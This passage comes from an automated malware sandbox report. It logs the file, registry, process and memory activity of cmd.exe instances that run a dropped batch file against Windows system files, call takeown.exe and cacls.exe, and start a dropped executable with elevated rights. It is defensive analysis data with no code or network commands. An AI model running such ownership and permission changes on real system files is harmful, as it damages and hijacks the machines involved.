| Write | STD_OUTPUT_HANDLE | size = 16 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 54 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 223, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0xf5c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0x84, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vIDhS3md.exe | os_pid = 0xc74, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x13d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75172780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7514fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74e435c0 |
|
1 |
Environment (47)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
13 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "Seyes.jtp" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
2 | |
| Set Environment String | name = FN, value = "Seyes.jtp" |
|
1 |
Process #84: dllhost.exe
0
0
| Information | Value |
|---|---|
| ID | #84 |
| File Name | c:\windows\system32\dllhost.exe |
| Command Line | C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:04:16, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:45 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb04 |
| Parent PID | 0x240 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A24
0x
E1C
0x
444
0x
510
0x
F24
0x
F20
0x
F14
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000ee0a280000 | 0xee0a280000 | 0xee0a29ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000ee0a280000 | 0xee0a280000 | 0xee0a28ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000ee0a290000 | 0xee0a290000 | 0xee0a296fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000ee0a2a0000 | 0xee0a2a0000 | 0xee0a2b3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000ee0a2c0000 | 0xee0a2c0000 | 0xee0a3bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000ee0a3c0000 | 0xee0a3c0000 | 0xee0a3c3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000ee0a3d0000 | 0xee0a3d0000 | 0xee0a3d1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0xee0a3e0000 | 0xee0a49dfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000ee0a4a0000 | 0xee0a4a0000 | 0xee0a4a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000ee0a4b0000 | 0xee0a4b0000 | 0xee0a4b6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000ee0a4c0000 | 0xee0a4c0000 | 0xee0a4c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| imm32.dll | 0xee0a4d0000 | 0xee0a503fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000ee0a4d0000 | 0xee0a4d0000 | 0xee0a4d0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000ee0a4e0000 | 0xee0a4e0000 | 0xee0a4e0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000ee0a4f0000 | 0xee0a4f0000 | 0xee0a4f2fff | Pagefile Backed Memory | r |
|
|
|
- |
| windowsshell.manifest | 0xee0a500000 | 0xee0a500fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000ee0a510000 | 0xee0a510000 | 0xee0a511fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000ee0a560000 | 0xee0a560000 | 0xee0a65ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000ee0a660000 | 0xee0a660000 | 0xee0a75ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000ee0a760000 | 0xee0a760000 | 0xee0a8fffff | Private Memory | rw |
|
|
|
- |
| rpcss.dll | 0xee0a760000 | 0xee0a835fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000ee0a760000 | 0xee0a760000 | 0xee0a85ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000ee0a8f0000 | 0xee0a8f0000 | 0xee0a8fffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0xee0a900000 | 0xee0ac36fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000ee0ac40000 | 0xee0ac40000 | 0xee0ad3ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000ee0ad40000 | 0xee0ad40000 | 0xee0ae3ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000ee0ae40000 | 0xee0ae40000 | 0xee0af3ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000ee0af40000 | 0xee0af40000 | 0xee0b0c7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000ee0b0d0000 | 0xee0b0d0000 | 0xee0b250fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000ee0b260000 | 0xee0b260000 | 0xee0c65ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000ee0c660000 | 0xee0c660000 | 0xee0c7fffff | Private Memory | rw |
|
|
|
- |
| ole32.dll | 0xee0c660000 | 0xee0c7a0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000ee0c7f0000 | 0xee0c7f0000 | 0xee0c7fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ff610000 | 0x7df5ff610000 | 0x7ff5ff60ffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x00007ff63d1c0000 | 0x7ff63d1c0000 | 0x7ff63d2bffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff63d2c0000 | 0x7ff63d2c0000 | 0x7ff63d2e2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff63d2e3000 | 0x7ff63d2e3000 | 0x7ff63d2e4fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff63d2e5000 | 0x7ff63d2e5000 | 0x7ff63d2e5fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff63d2e6000 | 0x7ff63d2e6000 | 0x7ff63d2e7fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff63d2e8000 | 0x7ff63d2e8000 | 0x7ff63d2e9fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff63d2ea000 | 0x7ff63d2ea000 | 0x7ff63d2ebfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff63d2ec000 | 0x7ff63d2ec000 | 0x7ff63d2edfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff63d2ee000 | 0x7ff63d2ee000 | 0x7ff63d2effff | Private Memory | rw |
|
|
|
- |
| dllhost.exe | 0x7ff63dbd0000 | 0x7ff63dbd6fff | Memory Mapped File | rwx |
|
|
|
- |
| thumbcache.dll | 0x7ffae6ef0000 | 0x7ffae6f3afff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7ffaecc30000 | 0x7ffaecea3fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7ffaf1040000 | 0x7ffaf11c2fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7ffaf2d10000 | 0x7ffaf2da5fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffaf3960000 | 0x7ffaf3992fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffaf3d00000 | 0x7ffaf3d16fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffaf41e0000 | 0x7ffaf41eafff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffaf4260000 | 0x7ffaf4287fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffaf4290000 | 0x7ffaf42fafff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffaf44d0000 | 0x7ffaf44defff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ffaf4bc0000 | 0x7ffaf4c72fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffaf4e50000 | 0x7ffaf502cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffaf5140000 | 0x7ffaf528dfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffaf5290000 | 0x7ffaf53b5fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ffaf53c0000 | 0x7ffaf53f5fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffaf5700000 | 0x7ffaf579cfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffaf57a0000 | 0x7ffaf57fafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffaf5800000 | 0x7ffaf5984fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ffaf6ec0000 | 0x7ffaf6f64fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ffaf6f70000 | 0x7ffaf70cbfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffaf70d0000 | 0x7ffaf717cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffaf7190000 | 0x7ffaf724dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffaf72e0000 | 0x7ffaf755bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
Process #88: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #88 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:22, Reason: Child Process |
| Unmonitor | End Time: 00:04:57, Reason: Self Terminated |
| Monitor Duration | 00:00:35 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xf04 |
| Parent PID | 0xbd0 (c:\users\ciihmnxmn6ps\desktop\current_dirnwovkcyl.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
AC8
0x
794
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000ae0000 | 0x00ae0000 | 0x00afffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000ae0000 | 0x00ae0000 | 0x00aeffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000af0000 | 0x00af0000 | 0x00af3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b00000 | 0x00b00000 | 0x00b01fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b00000 | 0x00b00000 | 0x00b03fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000b10000 | 0x00b10000 | 0x00b23fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000b30000 | 0x00b30000 | 0x00b6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b70000 | 0x00b70000 | 0x00c6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000c70000 | 0x00c70000 | 0x00c73fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000c80000 | 0x00c80000 | 0x00c80fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000c90000 | 0x00c90000 | 0x00c91fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ca0000 | 0x00ca0000 | 0x00daffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ca0000 | 0x00ca0000 | 0x00caffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000cb0000 | 0x00cb0000 | 0x00daffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000db0000 | 0x00db0000 | 0x00deffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e60000 | 0x00e60000 | 0x00e6ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00e70000 | 0x00f2dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000f30000 | 0x00f30000 | 0x0102ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001030000 | 0x01030000 | 0x0121ffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x013d0000 | 0x0141ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001420000 | 0x01420000 | 0x0541ffff | Pagefile Backed Memory | - |
|
|
|
- |
| sortdefault.nls | 0x05420000 | 0x05756fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x74540000 | 0x74547fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f110000 | 0x7f110000 | 0x7f20ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f210000 | 0x7f210000 | 0x7f232fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f238000 | 0x7f238000 | 0x7f238fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f239000 | 0x7f239000 | 0x7f23bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f23c000 | 0x7f23c000 | 0x7f23cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f23d000 | 0x7f23d000 | 0x7f23ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | vIDhS3md.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 79 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 58 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 22 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 60 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 41 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 240, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0xa2c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0x828, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vIDhS3md.exe | os_pid = 0xec0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x13d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75172780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7514fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74e435c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "WinMail.exe.mui" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "WinMail.exe.mui" |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 |
Process #89: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #89 |
| File Name | c:\windows\syswow64\cmd.exe |
